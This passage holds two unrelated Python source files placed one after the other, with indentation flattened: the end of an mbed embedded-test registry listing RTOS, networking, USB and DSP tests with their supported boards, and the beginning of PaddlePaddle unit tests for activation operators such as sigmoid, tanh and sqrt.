"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_2", "description": "Mutex resource lock",
"source_dir": join(TEST_DIR, "rtos", "mbed", "mutex"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_3", "description": "Semaphore resource lock",
"source_dir": join(TEST_DIR, "rtos", "mbed", "semaphore"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 20,
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_4", "description": "Signals messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "signals"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE", "NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG",
"NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_5", "description": "Queue messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "queue"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_6", "description": "Mail messaging",
"source_dir": join(TEST_DIR, "rtos", "mbed", "mail"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_7", "description": "Timer",
"source_dir": join(TEST_DIR, "rtos", "mbed", "timer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"duration": 15,
"automated": True,
#"host_test": "wait_us_auto",
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_8", "description": "ISR (Queue)",
"source_dir": join(TEST_DIR, "rtos", "mbed", "isr"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB],
"automated": True,
"mcu": ["LPC1768", "LPC1549", "LPC11U24", "LPC812", "LPC2460", "LPC824", "SSCI824",
"KL25Z", "KL05Z", "K64F", "KL46Z",
"RZ_A1H", "VK_RZ_A1H", "DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "DISCO_F469NI", "NUCLEO_F410RB",
"NUCLEO_F401RE", "NUCLEO_F334R8", "DISCO_F334C8", "NUCLEO_F302R8", "NUCLEO_F030R8", "NUCLEO_F070RB",
"NUCLEO_L031K6", "NUCLEO_L053R8", "DISCO_L053C8", "NUCLEO_L073RZ", "NUCLEO_F072RB", "NUCLEO_F091RC", "DISCO_L476VG", "NUCLEO_L476RG",
"DISCO_F401VC", "NUCLEO_F303RE", "NUCLEO_F303K8", "MAXWSNENV", "MAX32600MBED", "NUCLEO_L152RE",
"NUCLEO_F446RE", "NUCLEO_F103RB", "DISCO_F746NG", "NUCLEO_F746ZG", "MOTE_L152RC", "B96B_F446VE",
"EFM32HG_STK3400", "EFM32PG_STK3401", "EFM32LG_STK3600", "EFM32GG_STK3700", "EFM32WG_STK3800",
"NRF51822", "NRF51_DK", "NRF51_MICROBIT", "SEEED_TINY_BLE", "ARM_BEETLE_SOC"],
},
{
"id": "RTOS_9", "description": "SD File write-read",
"source_dir": join(TEST_DIR, "rtos", "mbed", "file"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
"automated": True,
"peripherals": ["SD"],
"mcu": ["LPC1768", "LPC11U24", "LPC812", "KL25Z",
"KL05Z", "K64F", "KL46Z", "RZ_A1H",
"DISCO_F407VG", "DISCO_F429ZI", "NUCLEO_F411RE", "NUCLEO_F401RE", "NUCLEO_F410RB", "DISCO_F469NI"],
},
# Networking Tests
{
"id": "NET_1", "description": "TCP client hello world",
"source_dir": join(TEST_DIR, "net", "helloworld", "tcpclient"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_2", "description": "NIST Internet Time Service",
"source_dir": join(TEST_DIR, "net", "helloworld", "udpclient"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"duration": 15,
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_3", "description": "TCP echo server",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_server"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "tcpecho_server_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_4", "description": "TCP echo client",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_client"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test": "tcpecho_client_auto",
"peripherals": ["ethernet"]
},
{
"id": "NET_5", "description": "UDP echo server",
"source_dir": join(TEST_DIR, "net", "echo", "udp_server"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "udpecho_server_auto",
"peripherals": ["ethernet"]
},
{
"id": "NET_6", "description": "UDP echo client",
"source_dir": join(TEST_DIR, "net", "echo", "udp_client"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
#"host_test" : "udpecho_client_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_7", "description": "HTTP client hello world",
"source_dir": join(TEST_DIR, "net", "protocols", "HTTPClient_HelloWorld"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"duration": 15,
"peripherals": ["ethernet"],
},
{
"id": "NET_8", "description": "NTP client",
"source_dir": join(TEST_DIR, "net", "protocols", "NTPClient_HelloWorld"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"peripherals": ["ethernet"],
},
{
"id": "NET_9", "description": "Multicast Send",
"source_dir": join(TEST_DIR, "net", "helloworld", "multicast_send"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_10", "description": "Multicast Receive",
"source_dir": join(TEST_DIR, "net", "helloworld", "multicast_receive"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_11", "description": "Broadcast Send",
"source_dir": join(TEST_DIR, "net", "helloworld", "broadcast_send"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_12", "description": "Broadcast Receive",
"source_dir": join(TEST_DIR, "net", "helloworld", "broadcast_receive"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"peripherals": ["ethernet"],
},
{
"id": "NET_13", "description": "TCP client echo loop",
"source_dir": join(TEST_DIR, "net", "echo", "tcp_client_loop"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY, TEST_MBED_LIB],
"automated": True,
"duration": 15,
#"host_test": "tcpecho_client_auto",
"peripherals": ["ethernet"],
},
{
"id": "NET_14", "description": "UDP PHY/Data link layer",
"source_dir": join(TEST_DIR, "net", "echo", "udp_link_layer"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, ETH_LIBRARY],
"automated": False,
"duration": 20,
"host_test": "udp_link_layer_auto",
"peripherals": ["ethernet"],
},
# u-blox tests
{
"id": "UB_1", "description": "u-blox USB modem: HTTP client",
"source_dir": [join(TEST_DIR, "net", "cellular", "http", "ubloxusb"), join(TEST_DIR, "net", "cellular", "http", "common")],
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, USB_HOST_LIBRARIES, UBLOX_LIBRARY],
"supported": CORTEX_ARM_SUPPORT,
},
{
"id": "UB_2", "description": "u-blox USB modem: SMS test",
"source_dir": [join(TEST_DIR, "net", "cellular", "sms", "ubloxusb"), join(TEST_DIR, "net", "cellular", "sms", "common")],
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, USB_HOST_LIBRARIES, UBLOX_LIBRARY],
"supported": CORTEX_ARM_SUPPORT,
},
# USB Tests
{
"id": "USB_1", "description": "Mouse",
"source_dir": join(TEST_DIR, "usb", "device", "basic"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_2", "description": "Keyboard",
"source_dir": join(TEST_DIR, "usb", "device", "keyboard"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_3", "description": "Mouse_Keyboard",
"source_dir": join(TEST_DIR, "usb", "device", "keyboard"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_4", "description": "Serial Port",
"source_dir": join(TEST_DIR, "usb", "device", "serial"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
},
{
"id": "USB_5", "description": "Generic HID",
"source_dir": join(TEST_DIR, "usb", "device", "raw_hid"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_6", "description": "MIDI",
"source_dir": join(TEST_DIR, "usb", "device", "midi"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
{
"id": "USB_7", "description": "AUDIO",
"source_dir": join(TEST_DIR, "usb", "device", "audio"),
"dependencies": [MBED_LIBRARIES, USB_LIBRARIES],
},
# CMSIS DSP
{
"id": "CMSIS_DSP_1", "description": "FIR",
"source_dir": join(TEST_DIR, "dsp", "cmsis", "fir_f32"),
"dependencies": [MBED_LIBRARIES, DSP_LIBRARIES],
},
# mbed DSP
{
"id": "DSP_1", "description": "FIR",
"source_dir": join(TEST_DIR, "dsp", "mbed", "fir_f32"),
"dependencies": [MBED_LIBRARIES, DSP_LIBRARIES],
},
# KL25Z
{
"id": "KL25Z_1", "description": "LPTMR",
"source_dir": join(TEST_DIR, "KL25Z", "lptmr"),
"dependencies": [MBED_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_2", "description": "PIT",
"source_dir": join(TEST_DIR, "KL25Z", "pit"),
"dependencies": [MBED_LIBRARIES],
"supported": CORTEX_ARM_SUPPORT,
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_3", "description": "TSI Touch Sensor",
"source_dir": join(TEST_DIR, "mbed", "tsi"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'TSI')],
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_4", "description": "RTC",
"source_dir": join(TEST_DIR, "KL25Z", "rtc"),
"dependencies": [MBED_LIBRARIES],
"mcu": ["KL25Z"],
},
{
"id": "KL25Z_5", "description": "MMA8451Q accelerometer",
"source_dir": join(TEST_DIR, "mbed", "i2c_MMA8451Q"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, join(PERIPHERALS, 'MMA8451Q')],
"mcu": ["KL25Z", "KL05Z", "KL46Z", "K20D50M"],
"automated": True,
"duration": 15,
},
# Examples
{
"id": "EXAMPLE_1", "description": "/dev/null",
"source_dir": join(TEST_DIR, "mbed", "dev_null"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test" : "dev_null_auto",
},
{
"id": "EXAMPLE_2", "description": "FS + RTOS",
"source_dir": join(TEST_DIR, "mbed", "fs"),
"dependencies": [MBED_LIBRARIES, RTOS_LIBRARIES, TEST_MBED_LIB, FS_LIBRARY],
},
# CPPUTEST Library provides Unit testing Framework
#
# To write TESTs and TEST_GROUPs please add CPPUTEST_LIBRARY to 'dependencies'
#
# This will also include:
# 1. test runner - main function with call to CommandLineTestRunner::RunAllTests(ac, av)
# 2. Serial console object to print test result on serial port console
#
# Unit testing with cpputest library
{
"id": "UT_1", "description": "Basic",
"source_dir": join(TEST_DIR, "utest", "basic"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_2", "description": "Semihost file system",
"source_dir": join(TEST_DIR, "utest", "semihost_fs"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
"mcu": ["LPC1768", "LPC2368", "LPC11U24"]
},
{
"id": "UT_3", "description": "General tests",
"source_dir": join(TEST_DIR, "utest", "general"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_BUSIO", "description": "BusIn BusOut",
"source_dir": join(TEST_DIR, "utest", "bus"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_I2C_EEPROM_ASYNCH", "description": "I2C Asynch eeprom",
"source_dir": join(TEST_DIR, "utest", "i2c_eeprom_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_SERIAL_ASYNCH", "description": "Asynch serial test (req 2 serial peripherals)",
"source_dir": join(TEST_DIR, "utest", "serial_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_SPI_ASYNCH", "description": "Asynch spi test",
"source_dir": join(TEST_DIR, "utest", "spi_asynch"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
{
"id": "UT_LP_TICKER", "description": "Low power ticker test",
"source_dir": join(TEST_DIR, "utest", "lp_ticker"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB, CPPUTEST_LIBRARY],
"automated": False,
},
# Tests used for target information purposes
{
"id": "DTCT_1", "description": "Simple detect test",
"source_dir": join(TEST_DIR, "mbed", "detect"),
"dependencies": [MBED_LIBRARIES, TEST_MBED_LIB],
"automated": True,
#"host_test" : "detect_auto",
},
]
# Group tests with the same goals into categories
GROUPS = {
"core": ["MBED_A1", "MBED_A2", "MBED_A3", "MBED_A18"],
"digital_io": ["MBED_A5", "MBED_A6", "MBED_A7", "MBED_A10", "MBED_A11"],
"analog_io": ["MBED_A8"],
"i2c": ["MBED_A19", "MBED_A20"],
"spi": ["MBED_A12"],
}
GROUPS["rtos"] = [test["id"] for test in TESTS if test["id"].startswith("RTOS_")]
GROUPS["net"] = [test["id"] for test in TESTS if test["id"].startswith("NET_")]
GROUPS["automated"] = [test["id"] for test in TESTS if test.get("automated", False)]
# Look for 'TEST_GROUPS' in mbed_settings.py and update the GROUPS dictionary
# with the information in test_groups if found
try:
from mbed_settings import TEST_GROUPS
except:
TEST_GROUPS = {}
GROUPS.update(TEST_GROUPS)
class Test:
DEFAULTS = {
#'mcu': None,
'description': None,
'dependencies': None,
'duration': 10,
'host_test': 'host_test',
'automated': False,
'peripherals': None,
#'supported': None,
'source_dir': None,
'extra_files': None
}
def __init__(self, n):
self.n = n
self.__dict__.update(Test.DEFAULTS)
self.__dict__.update(TESTS[n])
def is_supported(self, target, toolchain):
if hasattr(self, 'mcu') and not target in self.mcu:
return False
if hasattr(self, 'exclude_mcu') and target in self.exclude_mcu:
return False
if not hasattr(self, 'supported'):
return True
return (target in self.supported) and (toolchain in self.supported[target])
def get_description(self):
if self.description:
return self.description
else:
return self.id
def __cmp__(self, other):
return cmp(self.n, other.n)
def __str__(self):
return "[%3d] %s: %s" % (self.n, self.id, self.get_description())
def __getitem__(self, key):
if key == "id": return self.id
elif key == "mcu": return self.mcu
elif key == "exclude_mcu": return self.exclude_mcu
elif key == "dependencies": return self.dependencies
elif key == "description": return self.description
elif key == "duration": return self.duration
elif key == "host_test": return self.host_test
elif key == "automated": return self.automated
elif key == "peripherals": return self.peripherals
elif key == "supported": return self.supported
elif key == "source_dir": return self.source_dir
elif key == "extra_files": return self.extra_files
else:
return None
TEST_MAP = dict([(test['id'], Test(i)) for i, test in enumerate(TESTS)])
| |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle.fluid.core as core
from op_test import OpTest
from scipy.special import expit, erf
class TestActivation(OpTest):
def setUp(self):
self.op_type = "exp"
self.dtype = np.float32
self.init_dtype()
self.init_kernel_type()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.exp(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
def init_dtype(self):
self.dtype = np.float32
def init_kernel_type(self):
pass
class TestSigmoid(TestActivation):
def setUp(self):
self.op_type = "sigmoid"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
out = 1 / (1 + np.exp(-x))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.01)
class TestLogSigmoid(TestActivation):
def setUp(self):
self.op_type = "logsigmoid"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
out = np.log(1 / (1 + np.exp(-x)))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.008)
class TestTanh(TestActivation):
def setUp(self):
self.op_type = "tanh"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.tanh(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAtan(TestActivation):
def setUp(self):
self.op_type = "atan"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.arctan(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestTanhShrink(TestActivation):
def setUp(self):
self.op_type = "tanh_shrink"
self.init_dtype()
x = np.random.uniform(0.1, 1, [10, 17]).astype(self.dtype)
out = x - np.tanh(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.008)
class TestHardShrink(TestActivation):
def setUp(self):
self.op_type = "hard_shrink"
self.init_dtype()
threshold = 0.5
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.copy(x)
out[(out >= -threshold) & (out <= threshold)] = 0
self.attrs = {'lambda': threshold}
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.005)
class TestSoftShrink(TestActivation):
def setUp(self):
self.op_type = "softshrink"
self.init_dtype()
lambda_val = 0.1
x = np.random.uniform(0.25, 10, [4, 4]).astype(self.dtype)
out = np.copy(x)
out = (out < -lambda_val) * (out + lambda_val) + (out > lambda_val) * (
out - lambda_val)
self.attrs = {'lambda': lambda_val}
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSqrt(TestActivation):
def setUp(self):
self.op_type = "sqrt"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.sqrt(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestRsqrt(TestActivation):
def setUp(self):
self.op_type = "rsqrt"
self.init_dtype()
x = np.random.uniform(0.1, 1, [2, 3]).astype(self.dtype)
out = 1.0 / np.sqrt(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.0005)
class TestAbs(TestActivation):
def setUp(self):
self.op_type = "abs"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
# Because we set delta = 0.005 in calculating numeric gradient,
# if x is too small, such as 0.002, x_neg will be -0.003
# x_pos will be 0.007, so the numeric gradient is inaccurate.
# we should avoid this
x[np.abs(x) < 0.005] = 0.02
out = np.abs(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestCeil(TestActivation):
def setUp(self):
self.op_type = "ceil"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.ceil(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
# The same reason with TestFloor
def test_check_grad(self):
pass
class TestFloor(TestActivation):
def setUp(self):
